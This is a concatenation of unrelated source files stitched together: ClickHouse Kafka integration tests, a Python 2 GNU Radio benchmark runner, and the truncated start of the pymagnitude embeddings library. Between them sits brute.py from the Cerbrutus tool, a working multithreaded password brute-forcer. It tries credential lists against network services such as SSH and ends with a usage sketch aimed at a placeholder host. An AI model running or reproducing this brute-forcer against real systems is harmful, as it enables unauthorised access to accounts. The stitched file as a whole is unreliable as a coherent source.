CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3,10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce('topic_with_multiple_partitions2', messages)
time.sleep(30)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count) )
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
@pytest.mark.timeout(1200)
def test_kafka_rebalance(kafka_cluster):
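# Start a number of consumers in the same consumer group one by one (every start triggers a
# rebalance), then drop all but the last one; despite all the rebalances the destination table
# must end up containing every produced key exactly once.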
NUMBER_OF_CONSURRENT_CONSUMERS=11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
#time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce('topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
print("Setting up {}".format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
while int(instance.query("SELECT count() FROM test.destination WHERE _consumed_by='{}'".format(table_name))) == 0:
print("Waiting for test.kafka_consumer{} to start consume".format(consumer_index))
time.sleep(1)
cancel.set()
# leave the last one working intentionally (to finish consuming after all rebalances)
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS-1):
print("Dropping test.kafka_consumer{}".format(consumer_index))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{}'.format(consumer_index))
while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='kafka_consumer{}'".format(consumer_index))) == 1:
time.sleep(1)
# print(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
print("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed,msg_index[0]))
print(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
print("kafka_consumer{}".format(consumer_index))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(1200)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
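# 22 messages with kafka_max_block_size = 20 are written in two blocks; the ZooKeeper
# disconnect below is timed to hit between the blocks, and the final 22/22/22 check
# verifies that no rows were lost or duplicated around the failed write suffix.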
messages = [json.dumps({'key': j+1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(1);
''')
# the tricky part here is that the disconnect should happen after the write prefix, but before the write suffix,
# so sleepEachRow is used to slow the insert down enough to hit that window
with PartitionManager() as pm:
time.sleep(12)
pm.drop_instance_zk_connections(instance)
time.sleep(20)
pm.heal_all()
# connection restored and it will take a while until next block will be flushed
# it takes years on CI :\
time.sleep(90)
# as it's a bit tricky to hit the proper moment - let's check in logs if we did it correctly
assert instance.contains_in_log("ZooKeeper session has been expired.: while write prefix to view")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
@pytest.mark.timeout(120)
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
#kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
@pytest.mark.timeout(120)
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': j+1}) for j in range(1)]
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
while int(instance.query("SELECT count() FROM test.destination")) == 0:
print("Waiting for test.kafka_consumer to start consume")
time.sleep(1)
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
time.sleep(1)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(12)
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000;
''')
cancel.set()
time.sleep(15)
#kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
print(result)
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0]-1)), 'Missing data!'
@pytest.mark.timeout(120)
def test_bad_reschedule(kafka_cluster):
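# 20000 messages are produced up front; the final assert checks that the spread between the
# first and the last consume_ts stays under 8 seconds, i.e. the engine keeps polling instead
# of backing off with long reschedule pauses while data is still pending.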
messages = [json.dumps({'key': j+1, 'value': j+1}) for j in range(20000)]
kafka_produce('test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
while int(instance.query("SELECT count() FROM test.destination")) < 20000:
print("Waiting for consume")
time.sleep(1)
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
@pytest.mark.timeout(1200)
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.5);
''')
#print time.strftime("%m/%d/%Y %H:%M:%S")
time.sleep(12) # 5-6 sec to connect to kafka, do subscription, and fetch 20 rows, another 10 sec for MV, after that commit should happen
#print time.strftime("%m/%d/%Y %H:%M:%S")
kafka_cluster.pause_container('kafka1')
# that timeout is VERY important, and was picked after a lot of experiments
# when too low (<30sec) librdkafka will not report any timeout (alternative is to decrease the default session timeouts for librdkafka)
# when too high (>50sec) the broker will decide to remove us from the consumer group, and will start answering "Broker: Unknown member"
time.sleep(40)
#print time.strftime("%m/%d/%Y %H:%M:%S")
kafka_cluster.unpause_container('kafka1')
#kafka_cluster.open_bash_shell('instance')
# connection restored and it will take a while until next block will be flushed
# it takes years on CI :\
time.sleep(30)
# as it's a bit tricky to hit the proper moment - let's check in logs if we did it correctly
assert instance.contains_in_log("Local: Waiting for coordinator")
assert instance.contains_in_log("All commit attempts failed")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# timeout triggers rebalance, making further commits to the topic after getting back online
# impossible. So we have a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# if we come to the partition end we will repeat polling until reaching kafka_max_block_size or flush_interval
# that behavior is a bit questionable - we could just take bigger pauses between polls instead -
# to do more work in a single pass, and give the thread more rest.
# But in case of peaky loads in the kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# we can also come to eof because we drained the librdkafka internal queue too fast
@pytest.mark.timeout(120)
def test_premature_flush_on_eof(kafka_cluster):
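# The initial SELECT performs the subscription/assignment; after the MV is created the engine
# starts consuming, but hitting the end of the partition must not trigger a premature flush -
# both messages (produced before and after the MV) are expected to land in one single part.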
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
messages = [json.dumps({'key': j+1, 'value': j+1}) for j in range(1)]
kafka_produce('premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# all subscriptions/assignments were done during the select, so it starts sending data to test.destination
# immediately after creation of the MV
time.sleep(2)
# produce more messages after delay
kafka_produce('premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
time.sleep(6)
# it should be single part, i.e. single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
@pytest.mark.timeout(180)
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j+1, 'value': j+1}) for j in range(20000)]
kafka_produce('test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.query("SELECT * FROM test.kafka")
instance.query("SELECT count() FROM test.destination")
# enough to trigger issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination")) < 20000:
print("Waiting for consume")
time.sleep(1)
@pytest.mark.timeout(180)
def test_kafka_issue14202(kafka_cluster):
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
time.sleep(3)
instance.query('INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
if __name__ == '__main__':
cluster.start()
raw_input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
brute.py
|
import Cerbrutus.services as services
import time
import sys
import threading
from colorama import Fore, Style
import Cerbrutus
'''
Add estimated time remaining.
Add periodic output of how long the attack has been running.
'''
class BruteUtil:
threads = []
start = time.time()
end = time.time()
MAX_THREADS = 1000
def __init__(self, ip: str, port: int, service: str, users: list, passwords: list, threads: int = 10):
# Validate IP
if not isinstance(ip, str) or '.' not in ip:
raise ValueError("The Specified host to connect to does not seem to be a valid host.")
self.ip = ip
# Validate Port
try:
port = int(port)
except Exception:
raise ValueError("[-] - The Specified port to connect to does not seem to be a valid port between 1 and 65535.")
if not isinstance(port, int) or port > 65535 or port < 1:
raise ValueError("[-] - The Specified port to connect to does not seem to be a valid port between 1 and 65535.")
self.port = port
# Validate Service
if not isinstance(service, str) or service.upper() not in services.valid_services:
raise ValueError("[-] - The Specified service to connect to is not yet in the list of services. Please make a feature request, or write it and make a pull :P.")
service_info = services.valid_services[service.upper()]
self.service = service_info["class"]
recommended_threads = service_info["reccomendedThreads"]  # key spelling comes from the services registry
self.threads_num = threads
if threads > recommended_threads:
print(f"[!] - Maximum recommended threads for service {service.upper()} is {recommended_threads}...\n[!] - Be aware you may need to minimise the number of threads you use for better efficiency")
if threads > self.MAX_THREADS:
self.threads_num = self.MAX_THREADS
print(f"[*] - MAX NUMBER OF THREADS IS {self.MAX_THREADS}")
print(f"[+] - Running with {self.threads_num} threads...")
# Validate Users list
if not isinstance(users, list) or not users:
raise ValueError("[-] - The users to attempt must be a non-empty list.")
self.users = users
# Validate Passwords list
if not isinstance(passwords, list) or not passwords:
raise ValueError("[-] - The passwords to attempt must be a non-empty list.")
self.passwords = passwords
def test_connection(self):
if self.service.connect(self.ip, self.port, "test", "adidfhudgaduydfguiadhg fuioa ngkfcgsiufhkjnfkasdhgfuyadgbuf") is None:
print(f"[-] - COULD NOT CONNECT TO {self.ip}:{self.port}... EXITTING!")
self._exit()
def brute(self):
self.start = time.time()
self.creds_found = False
self.test_connection()
for user in self.users:
print(f"[*] - Starting attack against {user}@{self.ip}:{self.port}")
for pwd in self.passwords:
if self.creds_found:
self._exit()
self.passwords[self.passwords.index(pwd)] = pwd = Cerbrutus.Wordlist.clean_word(pwd)
thread = threading.Thread(target=self._auth, args=(user, pwd))
self.threads.append(thread)
while threading.active_count() > self.threads_num + 1:
continue
sys.stdout.write(f"\r[*] - Trying: {self.passwords.index(pwd) + 1}/{len(self.passwords)}")
thread.start()
self._exit()
def _auth(self, user, pwd):
if self.creds_found:
return
# sys.stdout.write(f"\r{user}:{pwd} ")
auth_result = self.service.connect(self.ip, self.port, user, pwd)
if auth_result:
self.creds_found = True
time.sleep(2)
print()
print(f"{Fore.GREEN}\033[1m[+] - VALID CREDENTIALS FOUND:\n\t{user}:{pwd}{Style.RESET_ALL}")
print(f"[*] - Took {(self.passwords.index(pwd)+1)*(self.users.index(user)+1)} tries")
self.end = time.time()
print(f"[*] Total time - {self.end - self.start} seconds.")
def _thread_collection(self):
for thread in self.threads:
try:
thread.join()
except RuntimeError:
pass
def _exit(self):
if not self.creds_found:
print("\n[*] - Approaching final keyspace...")
self._thread_collection()
if not self.creds_found:
print(f"{Fore.RED}\033[1m[-] - Failed to find valid credentials for {self.ip}:{self.port}{Style.RESET_ALL}")
self.end = time.time()
print(f"[*] Total time - {self.end - self.start} seconds.")
sys.exit()
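# --- Minimal usage sketch (illustrative only, not part of the original module) ---
# Assumptions: 'SSH' is one of the keys registered in Cerbrutus.services.valid_services,
# and the host, port and wordlists below are placeholders to be replaced by the caller.
if __name__ == '__main__':
    users = ['root', 'admin']
    passwords = ['password', 'letmein', 'toor']
    bruter = BruteUtil('192.0.2.10', 22, 'SSH', users, passwords, threads=10)
    bruter.brute()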
|
run_benchmarks.py
|
import sys
import os
import time
import subprocess
import copy
import numpy
from matplotlib.backends.backend_pdf import PdfPages
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
from matplotlib.font_manager import FontProperties
import multiprocessing
cpu_count = multiprocessing.cpu_count()
from bm_registry import BENCHMARKS
NUM_RUNS_PER_TEST = 3
BAD_BOOST_KILL_DURATION = 5.0 #seconds
__path__ = os.path.dirname(__file__)
import threading
#because boost interrupts are broken in half the versions of boost
#this stupidity makes stock gnuradio apps exit with bad boost
def kill_after_timeout(p):
time.sleep(BAD_BOOST_KILL_DURATION)
try: p.kill()
except: pass
def run_a_single_one(args, env):
print env
p = subprocess.Popen(args=args, env=env, stdout=subprocess.PIPE)
t = threading.Thread(target=kill_after_timeout, args = (p,))
t.daemon = True
t.start()
p.wait()
out = p.stdout.read()
#print out
for line in out.splitlines():
if line.startswith('##RESULT##'):
return float(line[len('##RESULT##'):].strip())
raise Exception, 'no result found!'
#return t1-t0
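# expand_tests(): for benchmark entries flagged with 'expand', emit three scheduling variants
# of the same test (Block / Spin / TPB) by toggling the GRAS_YIELD / GRAS_TPP environment
# variables; entries without the flag are yielded unchanged.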
def expand_tests(bm):
for run in bm['tests']:
if run.has_key('expand') and run['expand']:
new_run = copy.deepcopy(run)
new_run['wat'] += '\n(Block)'
new_run['env']['GRAS_YIELD'] = 'BLOCKING'
yield new_run
new_run = copy.deepcopy(run)
new_run['wat'] += '\n(Spin)'
new_run['env']['GRAS_YIELD'] = 'STRONG'
yield new_run
new_run = copy.deepcopy(run)
new_run['wat'] += '\n(TPB)'
new_run['env']['GRAS_YIELD'] = 'BLOCKING'
new_run['env']['GRAS_TPP'] = '1'
yield new_run
else: yield run
def do_a_benchmark(bm):
title = bm['wat']
print '#'*(len(title)+25)
print '## running benchmark:', title
print '#'*(len(title)+25)
result_means = list()
result_stddevs = list()
test_names = list()
for run in expand_tests(bm):
test_name = run['wat']
print '-'*(len(test_name)+25)
print '-- running test:', test_name.replace('\n', ' ')
print '-'*(len(test_name)+25)
test_names.append(test_name)
args = run['args']
args[0] = os.path.join(__path__, args[0])
args = [sys.executable] + args
env = run['env']
env = copy.copy(env)
if run.has_key('envextra'):
env.update(run['envextra'])
run_results = list()
for num_runs in range(NUM_RUNS_PER_TEST):
res = run_a_single_one(args=args, env=env)
print 'Result:', res
run_results.append(res)
result_means.append(numpy.average(run_results))
result_stddevs.append(numpy.std(run_results))
print 'result_means', result_means
print 'result_stddevs', result_stddevs
bogomips = numpy.array(result_means)/1e6
bogomips_dev = numpy.array(result_stddevs)/1e6
ind = numpy.arange(len(test_names))
width = 0.35
fig = Figure()
fig.set_size_inches((11,8.5))
FigureCanvas(fig)
ax = fig.add_subplot(1, 1, 1,
ylabel='Performance (BogoMips)', title=title,
xlabel='', xticks=ind+width/2., xticklabels=test_names
)
rects = ax.bar(ind, bogomips, width, color='blue',
yerr=bogomips_dev,
error_kw=dict(elinewidth=6, ecolor='pink'),
label=bm['moar']
)
ax.set_xlim(-width, max(len(ind), 4))
ax.set_ylim(0, max(*bogomips)*1.1 + max(*bogomips_dev)*2)
for rect in rects:
height = rect.get_height()
ax.text(rect.get_x()+rect.get_width()/2.0, 1.01*height, '%.3f'%height, horizontalalignment='center')
ax.grid(True)
fontP = FontProperties()
fontP.set_size('small')
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels, prop=fontP, loc="upper right")
print '\n'
return fig
if __name__ == '__main__':
####################################################################
## create pdf generator
####################################################################
pdf_pages = PdfPages(sys.argv[1])
####################################################################
## loop through tests
####################################################################
for bm in BENCHMARKS:
fig = do_a_benchmark(bm)
pdf_pages.savefig(fig)
####################################################################
## done
####################################################################
print 'make pdf...'
pdf_pages.close()
print 'done!'
|
__init__.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import bisect
import difflib
import gc
import http.client
import hashlib
import heapq
import lz4.frame
import math
import mmap
import operator
import os
import re
import sys
import tempfile
import threading
import time
import xxhash
import numpy as np
import uuid
from annoy import AnnoyIndex
from copy import deepcopy
from fasteners import InterProcessLock
from itertools import cycle, islice, chain, product, tee
from numbers import Number
from time import sleep
from pymagnitude.converter_shared import DEFAULT_NGRAM_END
from pymagnitude.converter_shared import BOW, EOW
from pymagnitude.converter_shared import CONVERTER_VERSION
from pymagnitude.converter_shared import fast_md5_file
from pymagnitude.converter_shared import char_ngrams
from pymagnitude.converter_shared import norm_matrix
from pymagnitude.converter_shared import unroll_elmo
from pymagnitude.converter_shared import KeyList
from pymagnitude.third_party.repoze.lru import lru_cache
try:
from itertools import imap
except ImportError:
imap = map
try:
from itertools import izip
except ImportError:
izip = zip
try:
unicode
except NameError:
unicode = str
try:
from http.client import CannotSendRequest, ResponseNotReady
except BaseException:
from httplib import CannotSendRequest, ResponseNotReady
try:
from urllib.request import urlretrieve
except BaseException:
from urllib import urlretrieve
try:
from urllib.parse import urlparse
except BaseException:
from urlparse import urlparse
try:
xrange
except NameError:
xrange = range
# Import AllenNLP
sys.path.append(os.path.dirname(__file__) + '/third_party/')
sys.path.append(os.path.dirname(__file__) + '/third_party_mock/')
from pymagnitude.third_party.allennlp.commands.elmo import ElmoEmbedder
# Import SQLite
try:
sys.path.append(os.path.dirname(__file__) + '/third_party/')
sys.path.append(os.path.dirname(__file__) + '/third_party/internal/')
from pymagnitude.third_party.internal.pysqlite2 import dbapi2 as sqlite3
db = sqlite3.connect(':memory:')
db.close()
_SQLITE_LIB = 'internal'
except Exception:
import sqlite3
_SQLITE_LIB = 'system'
# Import SQLite (APSW)
try:
import pymagnitude.third_party.internal.apsw as apsw
db = apsw.Connection(':memory:')
db.close()
_APSW_LIB = 'internal'
except Exception:
_APSW_LIB = 'none'
DEFAULT_LRU_CACHE_SIZE = 1000
def _sqlite_try_max_variable_number(num):
""" Tests whether SQLite can handle num variables """
db = sqlite3.connect(':memory:')
try:
db.cursor().execute(
"SELECT 1 IN (" + ",".join(["?"] * num) + ")",
([0] * num)
).fetchall()
return num
except BaseException:
return -1
finally:
db.close()
# Log function
def _log(*args):
args = list(args)
args[0] = "[Magnitude] " + args[0]
if not _log.disable_message:
print("[Magnitude] Magnitude is logging messages for slow "
"operations to standard error. To turn this"
" off pass log=False to the Magnitude "
"constructor.", file=sys.stderr)
_log.disable_message = True
print(*args, file=sys.stderr)
_log.disable_message = False
class Magnitude(object):
SQLITE_LIB = _SQLITE_LIB
APSW_LIB = _APSW_LIB
NGRAM_BEG = 1
NGRAM_END = DEFAULT_NGRAM_END
BOW = BOW
EOW = EOW
RARE_CHAR = u"\uF002".encode('utf-8')
FTS_SPECIAL = set('*^')
MMAP_THREAD_LOCK = {}
OOV_RNG_LOCK = threading.Lock()
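# Probe the largest number of bound SQL variables this SQLite build accepts
# (99, 999, 9999 or 99999), falling back to 1 if every probe fails.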
SQLITE_MAX_VARIABLE_NUMBER = max(max((_sqlite_try_max_variable_number(n)
for n in [99, 999, 9999, 99999])), 1)
MAX_KEY_LENGTH_FOR_STEM = 150
MAX_KEY_LENGTH_FOR_OOV_SIM = 1000
ENGLISH_PREFIXES = ['counter', 'electro', 'circum', 'contra', 'contro',
'crypto', 'deuter', 'franco', 'hetero', 'megalo',
'preter', 'pseudo', 'after', 'under', 'amphi',
'anglo', 'astro', 'extra', 'hydro', 'hyper', 'infra',
'inter', 'intra', 'micro', 'multi', 'ortho', 'paleo',
'photo', 'proto', 'quasi', 'retro', 'socio', 'super',
'supra', 'trans', 'ultra', 'anti', 'back', 'down',
'fore', 'hind', 'midi', 'mini', 'over', 'post',
'self', 'step', 'with', 'afro', 'ambi', 'ante',
'anti', 'arch', 'auto', 'cryo', 'demi', 'demo',
'euro', 'gyro', 'hemi', 'homo', 'hypo', 'ideo',
'idio', 'indo', 'macr', 'maxi', 'mega', 'meta',
'mono', 'mult', 'omni', 'para', 'peri', 'pleo',
'poly', 'post', 'pros', 'pyro', 'semi', 'tele',
'vice', 'dis', 'dis', 'mid', 'mis', 'off', 'out',
'pre', 'pro', 'twi', 'ana', 'apo', 'bio', 'cis',
'con', 'com', 'col', 'cor', 'dia', 'dis', 'dif',
'duo', 'eco', 'epi', 'geo', 'im ', 'iso', 'mal',
'mon', 'neo', 'non', 'pan', 'ped', 'per', 'pod',
'pre', 'pro', 'pro', 'sub', 'sup', 'sur', 'syn',
'syl', 'sym', 'tri', 'uni', 'be', 'by', 'co', 'de',
'en', 'em', 'ex', 'on', 're', 'un', 'un', 'up', 'an',
'an', 'ap', 'bi', 'co', 'de', 'di', 'di', 'du', 'en',
'el', 'em', 'ep', 'ex', 'in', 'in', 'il', 'ir', 'sy',
'a', 'a', 'a']
ENGLISH_PREFIXES = sorted(
chain.from_iterable([(p + '-', p) for p in ENGLISH_PREFIXES]),
key=lambda x: len(x), reverse=True)
ENGLISH_SUFFIXES = ['ification', 'ologist', 'ology', 'ology', 'able',
'ible', 'hood', 'ness', 'less', 'ment', 'tion',
